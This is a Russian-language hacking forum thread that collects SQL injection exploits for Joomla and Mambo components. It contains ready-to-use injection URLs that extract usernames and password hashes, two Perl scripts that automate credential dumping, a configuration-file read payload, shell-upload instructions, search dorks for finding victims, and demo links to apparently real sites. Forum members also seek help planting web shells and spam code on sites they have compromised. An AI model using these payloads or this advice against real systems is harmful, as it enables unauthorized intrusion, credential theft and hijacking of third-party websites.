Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Joomla "com_jomtube" component SQL Injection

Уязвим параметр user_id
Эксплyатация:

Code:

index.php?view=videos&type=member&user_id=[ID юзера] and 1=0 union select 1,2,3,4,5,6,7,8,concat(username,0x3a,password,0x3a,usertype),0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 from jos_users limit 0,5 -- &option=com_jomtube

user_id - должен быть существующий!

POC:

Дорк: "inurl:com_jomtube"


Уязвимый код:
components/com_jomtube/models/video.php
Пару моментов, все приводить не буду:

P.S:Уязвимость старая и давно есть в паблике, как сегодня убедился до сих пор актуальна.
http://www.exploit-db.com/exploits/14434/

 

Joomla tag Remote Sql Exploit
dork: inurl:index.php?option=com_tag

PHP:

#!/usr/bin/perl -w
print "\t\t\n\n";
print "\t\n";
print "\t                                                   \n";
print "\t      Joomla com_tag Remote Sql Exploit \n";
print "\t\n\n";
use LWP::UserAgent;
print "\nExample:[http://wwww.site.com/]: ";
chomp(my $target=<STDIN>);
$user="username";
$pass="password";
$table="jos_users";
$d4n="com_tag&task";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target ."index.php?option=".$d4n."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /<user>(.*?)<user>/){
print "\nLos Information for site:\n";
print "\n
* Admin User : $1";
}
if ($answer =~/<pass>(.*?)<pass>/){print "\n
* Admin Hash : $1\n\n";
print "\t\t#   Exploit finished   #\n\n";}
else{print "\n[-] Exploit Failed...\n";}


 

Joomla "com_commedia" component SQL Injection

Уязвим параметр id
Эксплyатация:

Code:

index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+concat%28username,0x3a,password,0x3a,usertype%29,2+from+jos_users+where+usertype+like+0x2561646D696E6973747261746F7225+limit+0,1+--+

POC:

Дорк: "inurl:com_commedia id"


Уязвимый код:
components/com_commedia/models/file.php

P.S: "_ttp://www.explo[google]it-db.com/exploits/22152/"

 

Если не просто копипастить баги и совать кавычки, а хотя бы 10 секунд посмотреть в код, станет очевидно, что там ещё и чтение файлов.

Как там у хакеров? 0day pRiv8

index.php?option=com_commedia&format=raw&task=down&pid=124&id=2238+and+1=0+union+select+0x2e2f636f6e66696775726174696f6e2e706870,2--+

 

Моя цель была раскрыть сам уязвимый код, а не копипаст! на счет чтения файлов я тоже видел, но еще пока не проверил...

 

Joomla "com_conference" SQL Injection

Уязвим параметр ID

Эксплуатация:

Code:

/index.php?option=com_conference&task=show&id=999999.9 /*!UNION ALL SELECT 0x31303235343830303536,0x31303235343830303536,concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e),0x31303235343830303536,0x31303235343830303536*/--

 

Сканер joomla сайта​

Появился новый проект - c0lips.ru, здесь вы можете проверить свой сайт на наличие уязвимых компонентах, посмотреть советы по устранению уязвимостей, посмотреть уязвимый код компонента и уже исправленный код.

Для актуализации проекта, прошу добавлять свои уязвимости по адресу: тык

 

Joomla All v1.5 Error Based SQL Injection Vulnerability

Joomla Component com_user

####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: [email protected]
# Category:: webapps
# script home : http://joomla.com
# Dork : inurlption=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!

// Description :

the affected component is /com_user/ in all joomla v1.5
P.S : you could know the version by openning the source code of the target and searching for "joomla" you'll see the version

// Exploit :

http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing id number by character]

# priv8 youtube link, just people who has the link could view :
http://www.youtube.com/watch?v=g0QcjxIb68I

// Demo :

http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='


# Greets To : ==============================================================================
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
# ... And All Algerian Hax0rs
============================================================================================

# 1337day.com [2012-12-12][/quote]

 

отличный

 

TinyMCE TinyBrowser addon multiple vulnerabilities

Салют, парни, кому-то удалось использовать эту уязвимость для заливки шелла? Может натолкнете на мысль верную, как обойти Restricted access

http://yehg.net/lab/pr0js/advisories/tinybrowser_1416_multiple_vulnerabilities

Спасибо за помощь.

 

Данная бага актуальна для joomla 1.5.12, которая сейчас практически не встречается и как вы ее собрались использовать я не понимаю.
В joomla заливайте шелл через модули/шаблоны, собственно как и в других CMS...

 

Подскажите пожалуйста, залит шелл на сайт под управлением Joomla (доступа в админку нет), подскажите можно ли в какой либо модуль воткнуть код системы sape ?

Дело в том что стоят права только на чтение в папке шаблона, и стандартным способом не удается установить sape
На модули выставлены права разрешающие редактирование


Также в папке шаблона залит мой php файл который я могу редактировать (на него выставлены права)

Заранее благодарен

 

Если есть возможность заливать в папку шаблона, то попробуй сначало скапировать к себе шаблон, орегинал удалить, а потом перезалить его, по идее должны стать права на правку, но естественно если сама папка в каторой находится шаблон с полными правами...

 

права на правку только в одном файле который лежит в папке с шаблоном, могу редактировать только его

еще права на редактирование на папки модулей

 

PHP-iclude: com_jomholiday

залиться пока не получилось, как зальюсь приведу пример уязвимого кода.

 

Code:

# Exploit Title:Joomla com_collecter shell upload 
# Author: Red Dragon_al (Alb0zZ Team) 
# Home :HackForums.AL,alb0zz.in 
# Date :19/01/2013   
# Category:: web apps 
# Google dork: [inurl:index.php?option=com_collector] 
# Tested on: Windows XP   
# Download: http://www.steevo.fr/en/download 
# Home Page: http://www.steevo.fr/   --------------------------------------- #      ~ Expl0itation ~      
# ---------------------------------------   
1- Google dork: [inurl:index.php?option=com_collector]   
2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   
3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1   upload ur shell as : shell.php                                                  
# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.   #2013

http://www.exploit-db.com/exploits/24228/

 

P.S: копировать не стоит сплоиты с других ресурсов, если копи пастите, то лудше с раскрытием уязвимого года не болие...

 

exploit [joomla]


Test screen [http://data.imagup.com/10/1171476626.png] [http://168.63.206.26/test2.png]
3xpl01t c0d3 :

Code:

Dork (N/A) "inurl:option=com_huruhelpdesk" or "inurl:/index.php?option=com_huruhelpdesk&view=detail"
author : *devil-zone.net
greet is to : devil-zone.net *all members 
vel = sqlI 

S1mPl3 P3rL 3xpl01t3r

Code:

#!/usr/bin/perl
#greet is to Evil-Dz
system("clear");
print "***************************************\n";
print " * * * * Good Luck & Hafe Fun * * * * *\n";
print " * * * Coded by devil-zone forum * * **\n"; 
print "***************************************\n\n";
use LWP::UserAgent;
print "Target page [ex: HosT] --> ";
chomp(my $target=<STDIN> );
$column_name="concat(username,0x3a,password,0x3a,mail)";
$table_name="jos_users";
$prm="-1/**/union/**/select/**/";
$start= LWP::UserAgent->new() or die "[!] Error while processing";
$start->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.12011');
$website= $target . "/index.php?option=com_huruhelpdesk&view=detail&cid[0]=".$prm."1,2,3,".$column_name.",5,6,7+from+jos_users--";
$ok= $start->request(HTTP::Request->new(GET=>$website));
$ok1= $ok->content; if ($ok1 =~/([0-9a-fA-F]{32})/){
print "[+] Password found --> $1\n\n";
sleep 1;
}
else
{
print "No password found :(\n";
} 

 

подскажите пожалуйста, как туда залить шелл? выбрать файл, даёт. а кнопка на загрузку не активна.

 

Подскажите пожалуйста, это какая версия джумлы: $Id: configuration.php-dist 11687 2009-03-11 17:49:23Z ian $ ?